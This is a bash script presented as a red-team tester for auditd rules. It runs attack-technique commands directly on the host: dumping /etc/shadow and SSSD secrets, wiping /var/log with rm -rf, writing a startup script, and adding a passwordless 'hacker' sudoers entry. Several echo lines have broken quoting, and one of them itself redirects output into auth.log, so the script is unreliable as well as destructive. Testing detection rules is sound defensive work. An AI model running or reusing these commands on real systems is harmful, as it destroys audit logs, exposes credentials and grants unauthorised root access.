#!/bin/bash
echo "[+] Starting Red Team Auditd Rule Tester"
echo '[+] Testing Execution...'
echo 'Executing: bash -c 'echo Execution Test''
bash -c 'echo Execution Test' 2>/dev/null || echo 'Failed to execute'
echo 'Executing: python3 -c 'print("Python Execution Test")''
python3 -c 'print("Python Execution Test")' 2>/dev/null || echo 'Failed to execute'
echo 'Executing: perl -e 'print "Perl Execution Test"''
perl -e 'print "Perl Execution Test"' 2>/dev/null || echo 'Failed to execute'
echo 'Executing: node -e 'console.log("Node Execution Test")''
node -e 'console.log("Node Execution Test")' 2>/dev/null || echo 'Failed to execute'
echo '[+] Testing Privilege Escalation...'
echo 'Executing: sudo -l'
sudo -l 2>/dev/null || echo 'Failed to execute'
echo 'Executing: su - root -c 'echo Privilege Escalation Test''
su - root -c 'echo Privilege Escalation Test' 2>/dev/null || echo 'Failed to execute'
echo '[+] Testing Credential Access...'
echo 'Executing: cat /etc/shadow'
cat /etc/shadow 2>/dev/null || echo 'Failed to execute'
echo 'Executing: cat /etc/passwd'
cat /etc/passwd 2>/dev/null || echo 'Failed to execute'
echo 'Executing: strings /var/lib/sss/secrets/*'
strings /var/lib/sss/secrets/* 2>/dev/null || echo 'Failed to execute'
echo '[+] Testing Log Modification...'
echo 'Executing: echo '' > /var/log/auth.log'
echo '' > /var/log/auth.log 2>/dev/null || echo 'Failed to execute'
echo 'Executing: rm -rf /var/log/*'
rm -rf /var/log/* 2>/dev/null || echo 'Failed to execute'
echo '[+] Testing Masquerading...'
echo 'Executing: ln -s /bin/bash /tmp/fakebash && /tmp/fakebash -c 'echo Masquerading Test''
ln -s /bin/bash /tmp/fakebash && /tmp/fakebash -c 'echo Masquerading Test' 2>/dev/null || echo 'Failed to execute'
echo '[+] Testing Network Command And Control...'
echo 'Executing: nc -zv 192.168.1.1 22'
nc -zv 192.168.1.1 22 2>/dev/null || echo 'Failed to execute'
echo 'Executing: curl -I http://example.com'
curl -I http://example.com 2>/dev/null || echo 'Failed to execute'
echo 'Executing: wget http://example.com/testfile'
wget http://example.com/testfile 2>/dev/null || echo 'Failed to execute'
echo '[+] Testing Persistence...'
echo 'Executing: echo 'malicious script' > /etc/init.d/malicious'
echo 'malicious script' > /etc/init.d/malicious 2>/dev/null || echo 'Failed to execute'
echo 'Executing: echo 'hacker ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers'
echo 'hacker ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers 2>/dev/null || echo 'Failed to execute'
